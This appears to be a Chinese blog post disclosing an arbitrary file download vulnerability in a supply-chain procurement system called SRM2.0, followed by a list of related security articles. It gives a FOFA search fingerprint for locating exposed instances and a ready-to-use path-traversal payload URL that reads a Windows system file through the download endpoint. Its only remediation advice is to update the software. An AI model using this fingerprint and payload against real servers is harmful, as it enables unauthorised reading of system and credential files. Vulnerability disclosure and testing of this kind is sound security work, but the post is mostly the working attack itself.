某云彩SRM2.0任意文件下载漏洞

文章目录

免责申明

本文章仅供学习与交流,请勿用于非法用途,均由使用者本人负责,文章作者不为此承担任何责任

搜索语法

fofa

复制代码
icon_hash="1665918155"

漏洞描述

某云采 SRM2.0是一款先进的供应链管理系统,旨在优化企业的采购流程和供应商管理。该系统通过云端技术,提供实时的数据分析和智能决策支持,帮助企业提高采购效率和降低成本。

该系统download在接口处存在任意文件下载漏洞

漏洞复现

payload

复制代码
http://ip/adpweb/static/%2e%2e;/a/sys/runtimeLog/download?path=C:\Windows\System32\drivers\etc\hosts


修复建议

更新到最新版本

相关推荐
奔跑吧邓邓子5 小时前
【C++实战(75)】筑牢安全防线,攻克漏洞难题
c++·安全·实战·漏洞
黑客思维者4 天前
Notepad++中高危DLL劫持漏洞深度剖析
notepad++·漏洞·dll劫持
李白你好1 个月前
CVE-2025-2502 / CNVD-2025-16450 联想电脑管家权限提升漏洞
漏洞
网络研究院1 个月前
Citrix 零日漏洞自五月起遭积极利用
网络·安全·漏洞·威胁
网络研究院1 个月前
新的 SHAMOS MacOS 窃取程序利用单行终端命令攻击用户
macos·攻击·漏洞·用户
IT 青年2 个月前
CVE-2014-6271(bash破壳漏洞 )
漏洞
网络研究院2 个月前
新的“MadeYouReset”方法利用 HTTP/2 进行隐秘的 DoS 攻击
网络·网络协议·安全·http·攻击·漏洞
IT 青年2 个月前
CVE-2020-24557
漏洞
第十六年盛夏.2 个月前
【网络安全】不安全的反序列化漏洞
网络安全·漏洞
IT 青年2 个月前
CVE-2021-21148
漏洞